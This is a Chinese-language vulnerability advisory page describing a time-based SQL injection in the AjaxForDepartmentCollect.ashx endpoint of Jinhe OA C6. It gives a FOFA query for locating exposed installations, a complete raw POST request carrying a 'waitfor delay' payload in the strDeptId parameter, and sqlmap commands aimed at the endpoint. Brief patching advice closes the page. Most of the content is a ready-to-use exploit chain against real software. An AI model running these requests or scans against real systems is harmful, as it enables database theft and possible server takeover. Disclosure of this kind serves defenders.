漏洞信息
| 项目 | 内容 |
|---|---|
| 漏洞名称 | 金和OA AjaxForDepartmentCollect.ashx SQL注入漏洞 |
| 漏洞类型 | SQL注入 |
| 组件 | 金和OA C6 / JHSoft.Web.CostControl/Collect/AjaxForDepartmentCollect.ashx |
| 影响版本 | 金和OA |
漏洞概述
金和网络是专业信息化服务商,为城市监管部门提供互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台等服务。金和OA C6 AjaxForDepartmentCollect.ashx 接口处存在SQL注入漏洞,攻击者可以利用SQL注入漏洞获取数据库中的信息(例如管理员后台密码、用户个人信息),甚至在高权限情况下可向服务器写入木马,获取服务器系统权限。
测绘语法
FOFA
app="金和网络-金和OA"
POC
原始请求包
POST /C6/JHSoft.Web.CostControl/Collect/AjaxForDepartmentCollect.ashx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=r11tlou0h25eawqzrke52bpl
Content-Length: 97
method=getHistoryList&strDeptId=1;waitfor delay'0:0:4'--&strCollectType=Department&strYear=2012
漏洞特征
- 请求路径:
/C6/JHSoft.Web.CostControl/Collect/AjaxForDepartmentCollect.ashx - 请求方法: POST
- 参数:
strDeptId可注入 - 延迟: 4秒
检测方法
# 使用sqlmap检测
sqlmap -u "http://target/C6/JHSoft.Web.CostControl/Collect/AjaxForDepartmentCollect.ashx" \
--data="method=getHistoryList&strDeptId=1&strCollectType=Department&strYear=2012" \
--level=5 --risk=3
# 手工测试
sqlmap -u "http://target/C6/JHSoft.Web.CostControl/Collect/AjaxForDepartmentCollect.ashx" \
--data="method=getHistoryList&strDeptId=1*&strCollectType=Department&strYear=2012"
漏洞修复
- 联系厂商打补丁或升级版本
- 增加Web应用防火墙防护
- 关闭互联网暴露面或接口设置访问权限
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END









暂无评论内容